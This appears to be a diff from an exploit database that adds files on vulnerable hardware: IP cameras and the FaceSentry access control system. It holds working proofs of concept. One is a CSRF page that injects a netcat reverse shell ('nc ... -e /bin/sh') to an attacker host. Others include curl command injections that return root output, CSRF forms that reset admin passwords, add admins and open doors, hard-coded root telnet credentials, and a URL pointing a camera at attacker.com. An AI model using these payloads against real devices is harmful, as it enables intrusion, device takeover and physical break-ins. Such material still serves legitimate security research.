http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8
Although the above mention URL takes (.m3u8) format based video. We can use
`curl -v -X GET` to send such request, typically this is an unauth remote
file inclusion. An attacker could broadcast any video without any
authentication, the worst case attacker could leverage this vulnerability
to broadcast a fake emergency message.

27
exploits/hardware/webapps/46993.txt Normal file
View file

@ -0,0 +1,27 @@
1. Advisory Information
========================================
Title: Clever Dog Smart Camera
Vendor Homepage: http://www.cleverdog.com.cn/
Tested on Camera types : DOG-2W, DOG-2W-V4
Vulnerability: Hardware- Multiple Vulnerabilities
Date: 14/06/2019
Author: Alex Akinbi Twitter: @alexakinbi
1. Unauthenticated file disclosure:
========================================
An attacker on the local network has unauthenticated access to the internal SD card via HTTP service on port 8000. The HTTP web server on the camera allows an attacker to download video archive recorded and saved on the external memory card attached.
For example: http://192.168.1.81:8000/20190606
2. Telnet Backdoor using default credentials:
========================================
An attacker on the network can login remotely to the camera and gain root access. The device ships with hard-coded credentials, accessible from a telnet login prompt using credentials username: " root" and password: "12345678". These credentials work on all devices.
3. Login password sent over network unencrypted using Clever Dog App:
========================================
Using a packet sniffer, an attacker on the same network can capture data packets and view
captured user login password MD5 hash. A weak password can be cracked and used to login to the user account.
4. SOLUTION
========================================
Contact the vendor for further information regarding the proper mitigation of this vulnerability.

60
exploits/hardware/webapps/47033.html Normal file
View file

@ -0,0 +1,60 @@
# Exploit Title: FCM-MB40 Remote Command Execution as Root via CSRF
# Date: 2019-06-19
# Exploit Author: @XORcat
# Vendor Homepage: https://fortinet.com/
# Software Link: Customer Account Required
# Version: v1.2.0.0
# Tested on: Linux
# CVE : TBA
<html>
<!-- FCM-MB40 CSRF to RCE as root, by Aaron Blair (@xorcat)
Full details: https://xor.cat/2019/06/19/fortinet-forticam-vulns/
Follow the following steps to demonstrate this PoC:
1. Replace IP addresses in Javascript code to repr esent your testing
environment.
2. Launch a `netcat` listener on the attacker's host using `nc -nvlp
1337`
3. Ensure the "admin" user's browser is logged in to the FCM-MB40.
* Note: all modern browsers will cache Basic Authentication
credentials (such as those used by the FCM-MB40) even if the
FCM-MB40's administration page is closed.
4. Open the crafted HTML document using the "admin" user's
browser.
* Note: In an attack scenario, this step would be performed by
implanting the code into a legitimate webpage that the "admin"
user visits, or by tricking the "admin" user into opening a page
which includes the code.
5. Note that the `netcat` listener established in step 2. has received
a connection from the camera, and that it is presenting a `/bin/sh`
session as root.
* Note: type `id` in the `netcat` connection to verify this.
_Note: After this issue has been exploited, the state of the system will
have changed, and future exploitation attempts may require
modification._
-->
<head>
<script>
const sleep = (milliseconds) => {
return new Promise(resolve => setTimeout(resolve, milliseconds))
};
var sed_url = 'http://192.168.1.20/cgi-bin/camctrl_save_profile.cgi?num=9&name=a%20-e%20s/^if.*/nc\\t192.168.1.10\\t1337\\t-e\\t\\/bin\\/sh\\nexit/%20../cgi-bin/ddns.cgi%20&save=profile';
var execute_url = 'http://192.168.1.20/cgi-bin/ddns.cgi';
var sed_img = document.createElement("img");
sed_img.src = sed_url;
sleep(400).then(() => {
var execute_img = document.createElement("img");
execute_img.src = execute_url;
});
</script>
</head>
<body>
<h1>Welcome to my non-malicious website.</h1>
</body>
</html>

123
exploits/hardware/webapps/47064.txt Normal file
View file

@ -0,0 +1,123 @@
FaceSentry Access Control System 6.4.8 Remote Command Injection
Vendor: iWT Ltd.
Product web page: http://www.iwt.com.hk
Affected version: Firmware 6.4.8 build 264 (Algorithm A16)
Firmware 5.7.2 build 568 (Algorithm A14)
Firmware 5.7.0 build 539 (Algorithm A14)
Summary: FaceSentry 5AN is a revolutionary smart identity
management appliance that offers entry via biometric face
identification, contactless smart card, staff ID, or QR-code.
The QR-code upgrade allows you to share an eKey with guests
while you're away from your Office and monitor all activity
via the web administration tool. Powered by standard PoE
(Power over Ethernet), FaceSEntry 5AN can be installed in
minutes with only 6 screws. FaceSentry 5AN is a true enterprise
grade access control or time-and-attendance appliance.
Desc: FaceSentry suffers from an authenticated OS command
injection vulnerability using default credentials. This can
be exploited to inject and execute arbitrary shell commands
as the root user via the 'strInIP' and 'strInPort' parameters
(POST) in pingTest and tcpPortTest PHP scripts.
==============================================================
/pingTest.php:
--------------
8: if (!isAuth('TestTools','R')){
9: echo "No Permission";
10: include("footer.php");
11: exit;
12: }
13:
14: if(isset($_POST["strInIP"])){
15: $strInIP = $_POST["strInIP"];
16: }else{
17: $strInIP = "";
18: }
19:
20: $strOperationResult = "";
21: if ($strInIP != ""){
22:
23: $out = array();
24: exec("sudo ping -c 4 $strInIP",$out);
25: $result = "";
26: foreach($out as $line){
27: $result = $result.$line."<br>";
28: }
--------------------------------------------------------------
/tcpPortTest.php:
-----------------
14: if (isset($_POST["strInIP"])){
15: $strInIP = $_POST["strInIP"];
16: }else{
17: $strInIP = "";
18: }
19: if (isset($_POST["strInPort"])){
20: $strInPort = $_POST["strInPort"];
21: }else{
22: $strInPort = "";
23: }
..
..
53: $strOperationResult = "";
54: if ($strInIP != "" and $strInPort != ""){
55: $fp = fsockopen($strInIP, $strInPort, $errno, $errstr, 10);
56: system("date>>".TCP_PORT_TEST);
57: if (!$fp) {
58: $strOperationResult = getDisplay("TestTools.TCPPortTestFail")." $errstr ($errno)";
59: system("echo -e \"Unable to connect to $strInIP:$strInPort\">>".TCP_PORT_TEST);
60: } else {
61: fclose($fp);
62: $strOperationResult = getDisplay("TestTools.TCPPortTestSucces");
63: system("echo -e \"Successfully connected to $strInIP:$strInPort\">>".TCP_PORT_TEST);
64: }
65: }
==============================================================
Tested on: Linux 4.14.18-sunxi (armv7l) Ubuntu 16.04.4 LTS (Xenial Xerus)
Linux 3.4.113-sun8i (armv7l)
PHP/7.0.30-0ubuntu0.16.04.1
PHP/7.0.22-0ubuntu0.16.04.1
lighttpd/1.4.35
Armbian 5.38
Sunxi Linux (sun8i generation)
Orange Pi PC +
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5523
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5523.php
28.05.2019
--
$ curl -X POST 'http://192.168.11.1/tcpPortTest.php' \
--data 'strInIP=1.2.3.4`sudo id > garbage.txt`&strInPort=80' \
-H 'Cookie: PHPSESSID=21t4idf15fnkd61rerql9al4n3'
$ curl http://192.168.11.1/garbage.txt
uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------------------------------------
$ curl -X POST 'http://192.168.11.1/pingTest.php' \
--data 'strInIP=;sudo id' \
-H 'Cookie: PHPSESSID=21t4idf15fnkd61rerql9al4n3' \
|grep uid
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 7726 0 7697 100 29 10180 38 --:--:-- --:--:-- --:--:-- 10181
<font color='red'>Ping Test Fail! (;sudo id)<br>uid=0(root) gid=0(root) groups=0(root)<br></font><div id="six_tab_pages_nav" class="six_tab_pages_nav">

148
exploits/hardware/webapps/47065.txt Normal file
View file

@ -0,0 +1,148 @@
FaceSentry Access Control System 6.4.8 Cross-Site Request Forgery
Vendor: iWT Ltd.
Product web page: http://www.iwt.com.hk
Affected version: Firmware 6.4.8 build 264 (Algorithm A16)
Firmware 5.7.2 build 568 (Algorithm A14)
Firmware 5.7.0 build 539 (Algorithm A14)
Summary: FaceSentry 5AN is a revolutionary smart identity
management appliance that offers entry via biometric face
identification, contactless smart card, staff ID, or QR-code.
The QR-code upgrade allows you to share an eKey with guests
while you're away from your Office and monitor all activity
via the web administration tool. Powered by standard PoE
(Power over Ethernet), FaceSEntry 5AN can be installed in
minutes with only 6 screws. FaceSentry 5AN is a true enterprise
grade access control or time-and-attendance appliance.
Desc: The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks
to verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits
a malicious web site.
Tested on: Linux 4.14.18-sunxi (armv7l) Ubuntu 16.04.4 LTS (Xenial Xerus)
Linux 3.4.113-sun8i (armv7l)
PHP/7.0.30-0ubuntu0.16.04.1
PHP/7.0.22-0ubuntu0.16.04.1
lighttpd/1.4.35
Armbian 5.38
Sunxi Linux (sun8i generation)
Orange Pi PC +
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5524
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5524.php
28.05.2019
--
CSRF change administrator password:
-----------------------------------
<html>
<body>
<script>history.pushState('', 'CSRF', 'sentryInfo.php')</script>
<form action="http://192.168.11.1/personalSetting.php" method="POST">
<input type="hidden" name="strInAction" value="updateUser" />
<input type="hidden" name="strInUserID" value="administrator" />
<input type="hidden" name="isChangePwd" value="1" />
<input type="hidden" name="strInLanguage" value="Eng" />
<input type="hidden" name="strInPassword" value="t00tw00t />
<input type="hidden" name="strInConfirmPassword" value="t00tw00t" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
CSRF add admin:
---------------
<html>
<body>
<script>history.pushState('', 'CSRF', 'sentryInfo.php')</script>
<form action="http://192.168.11.1/userList.php?" method="POST">
<input type="hidden" name="strInAction" value="addUser" />
<input type="hidden" name="strInUserID" value="Testinugs" />
<input type="hidden" name="strInUserFunctionPermissionGroupID" value="Admin" />
<input type="hidden" name="strInDescription" value="CSRFd" />
<input type="hidden" name="strInLanguage" value="Eng" />
<input type="hidden" name="strInPassword" value="123123" />
<input type="hidden" name="strInConfirmPassword" value="123123" />
<input type="hidden" name="strInStatus" value="Active" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
Change administrator password via different path:
-------------------------------------------------
<html>
<body>
<script>history.pushState('', 'CSRF', 'sentryInfo.php')</script>
<form action="http://192.168.11.1/userList.php?" method="POST">
<input type="hidden" name="strInAction" value="updateUser" />
<input type="hidden" name="strInPageNo" value="0" />
<input type="hidden" name="strInUserID" value="administrator" />
<input type="hidden" name="isChangePwd" value="1" />
<input type="hidden" name="strInDescription" value="Default&#32;Sys&#46;&#32;Admin" />
<input type="hidden" name="strInUserFunctionPermissionGroupID" value="Admin" />
<input type="hidden" name="strInLanguage" value="Eng" />
<input type="hidden" name="strInStatus" value="Active" />
<input type="hidden" name="strInPassword" value="123456" />
<input type="hidden" name="strInConfirmPassword" value="123456" />
<input type="hidden" name="strEditPageNo" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
Add special card:
-----------------
<html>
<body>
<script>history.pushState('', 'CSRF', 'sentryInfo.php')</script>
<form action="http://192.168.11.1/specialCard.php?" method="POST">
<input type="hidden" name="strInSpecialCardID" value="deadbeef" />
<input type="hidden" name="strInSpecialCardStatus" value="" />
<input type="hidden" name="strInSpecialCardEnrollHigh" value="1" />
<input type="hidden" name="strInSpecialCardEnrollLow" value="1" />
<input type="hidden" name="strInSpecialCardRescue" value="1" />
<input type="hidden" name="strInSpecialCardOpenDoor" value="1" />
<input type="hidden" name="strInSpecialCardReboot" value="1" />
<input type="hidden" name="strInSpecialCardShutDown" value="1" />
<input type="hidden" name="strInAction" value="addNewSpecialCard" />
<input type="hidden" name="strInPageNo" value="0" />
<input type="hidden" name="strEditPageNo" value="" />
<input type="hidden" name="strInNewSpecialCard" value="deadbeef" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
CSRF open door 0:
-----------------
<html>
<body>
<script>history.pushState('', 'CSRF', 'sentryInfo.php')</script>
<form action="http://192.168.11.1/openDoor.php?" method="POST">
<input type="hidden" name="strInAction" value="openDoor" />
<input type="hidden" name="strInPageNo" value="0" />
<input type="hidden" name="strInRestartAction" value="" />
<input type="hidden" name="strPanelIDRestart=" value="" />
<input type="hidden" name="strPanelRestartAction" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Some files were not shown because too many files have changed in this diff Show more